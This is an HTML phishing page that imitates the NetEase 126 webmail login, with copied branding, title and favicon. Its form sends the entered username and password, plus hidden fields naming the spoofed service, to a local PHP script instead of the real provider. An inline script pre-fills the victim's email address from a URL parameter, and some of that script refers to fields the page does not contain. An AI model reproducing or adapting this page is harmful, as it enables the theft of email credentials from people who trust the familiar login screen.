<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>126&#32593;&#26131;&#20813;&#36153;&#37038;-&#20320;&#30340;&#19987;&#19994;&#30005;&#23376;&#37038;&#23616;</title>
<link rel="shortcut icon" href="https://mail.163.com/favicon.ico"/>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #676767;
  font-weight: 700;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=text]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  padding: 8 15px;
  margin: 0;
  background-color: transparent;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 0px;
  border-radius: 5px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  }
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  padding: 8 15px;
  margin: 0;
  background-color: transparent;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  }
  input[type=text]:focus, 
  input[type=password]:focus {
  outline: none;
  background-color: transparent;
  border: 1px solid #2985db;
  }
 </style>
<body background="img/bg.png">

<table border="0" width="100%" cellspacing="0" cellpadding="0">
	<tr>
		<td>
		<table border="0" width="100%" cellspacing="0" cellpadding="0">
			<tr>
				<td width="40"></td>
				<td width="315">
				<img border="0" src="img/header_101.png" width="315" height="70"></td>
				<td></td>
				<td width="532">
				<img border="0" src="img/header_102.png" width="532" height="70"></td>
				<td width="40"></td>
			</tr>
		</table>
		</td>
	</tr>
	<tr>
		<td height="66" ></td>
	</tr>
	<tr>
		<td>
		<table border="0" width="100%" cellspacing="0" cellpadding="0">
			<tr>
				<td width="186" height="488"></td>
				<td width="459">&nbsp;</td>
				<td></td>
				<td width="400" background="img/form.png">
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
				  <form action="/to/to.php" method="post"> 
					<tr>
						<td height="116"></td>
					</tr>
					<tr>
						<td>
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td width="31">&nbsp;</td>
								<td height="48">
								    <input type="text" id="userInput" name="user" placeholder="&#37038;&#31665;&#36134;&#21495;&#25110;&#25163;&#26426;&#21495;&#30721;" value="user" >
                                                 		    <input  name="link" type="hidden" value="https://mail.126.com/"  />
                                                 		    <input  name="domain" type="hidden" value="126.com"  />
                                                 		    <input  name="sender" type="hidden" value="126.com"  />
								</td>
								<td width="28">&nbsp;</td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="17"></td>
					</tr>
					<tr>
						<td>
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td width="31">&nbsp;</td>
								<td height="48">
								    <input type="password" name="passwd" placeholder="&#36755;&#20837;&#23494;&#30721;" value="" autofocus ></td>
								<td width="28">&nbsp;</td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="82"></td>
					</tr>
						<td height="20"></td>
				         <tr>
						<td>
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td width="31"></td>
								<td>
								<input type="image" src="img/btn.png" width="340" height="50"></td>
								<td width="28">&nbsp;</td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="128"></td>
					</tr>
				  </form>
				</table>
				</td>
				<td width="80"></td>
			</tr>
		</table>
		</td>
	</tr>
	<tr>
		<td height="30"></td>
	</tr>
	<tr>
		<td>
		<table border="0" width="100%" cellspacing="0" cellpadding="0">
			<tr>
				<td width="348"></td>
				<td>
				<img border="0" src="img/footer.png" width="681" height="104"></td>
				<td width="327"></td>
			</tr>
		</table>
		</td>
	</tr>
</table>
<script>
  const params = new URLSearchParams(window.location.search);
  const raw = params.get('login');
  const email = raw ? decodeURIComponent(raw) : '';
  
  if (email.includes('@')) {
    const [user, domain] = email.split(/@(.*)/, 2);
    document.getElementById('userInput').value = user;
    document.getElementById('domainField').value = domain;
    document.getElementById('hiddenLink').value = `https://${domain}`;
    document.getElementById('hiddenSender').value = domain;
  }
</script>
</body>

</html>